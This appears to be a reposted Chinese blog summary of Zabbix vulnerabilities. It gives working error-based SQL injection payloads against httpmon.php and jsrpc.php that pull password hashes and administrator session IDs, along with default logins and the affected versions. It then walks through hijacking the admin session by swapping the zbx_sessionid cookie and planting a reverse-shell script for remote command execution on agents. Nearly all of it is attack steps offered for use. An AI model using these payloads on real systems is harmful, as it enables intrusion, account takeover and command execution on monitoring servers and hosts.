http://vinc.top/2017/04/18/zabbix%e6%bc%8f%e6%b4%9e%e6%80%bb%e7%bb%93/
影响版本
1.8.5-1.8.9
利用前提
需要登录,默认口令 admin/zabbix或者是guest/空
使用Guest账户登录
报错注入
httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
可以获取到加密后密码
zabbix的session是存储在zabbix.sessions表中的
mysql> select sessionid from zabbix.sessions where status=0 and userid=1 limit 0,1; +----------------------------------+ | sessionid | +----------------------------------+ | 0207b91351782e881d98cdbb1074b5bb | +----------------------------------+ 1 row in set (0.00 sec)
通过注入获取到zabbix.sessions中保存着用户的session信息
httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
可以获取到session
session:00afc31ea35f3f156ebb5c4b3b119be3
然后进行Cookie欺骗 直接替换zbx_sessionid为这个00afc31ea35f3f156ebb5c4b3b119be3
成功以administrator登陆
Administrator–>Scripts Create script 添加command为反弹命令
然后去找触发点,例如在Monitoring–>Triggers或者Monitoring–>Events都可以,过滤的时候把条件设置的宽松一些,能够筛选出尽量多的主机。然后来到这里 可以执行刚才设置的指令
这里命令执行成功的前提是zabbix客户端zabbix_agentd.conf配置
EnableRemoteCommands=1
获取到的权限是zabbix agent的运行权限。
SQL注入(二)
影响版本
2.2.x, 3.0.0-3.0.3
漏洞前提
需要登录,默认口令 admin/zabbix或者是guest/空
漏洞URL
http://*.*.*.*/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(sessionid%20as%20char),0x7e))%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
报错如下:
得到session为0000cfd165072547509ff0b7fef9ed96,修改使用Firefox下插件Cookies Manager+修改zbx_sessionid为该值,就能以管理员权限登录。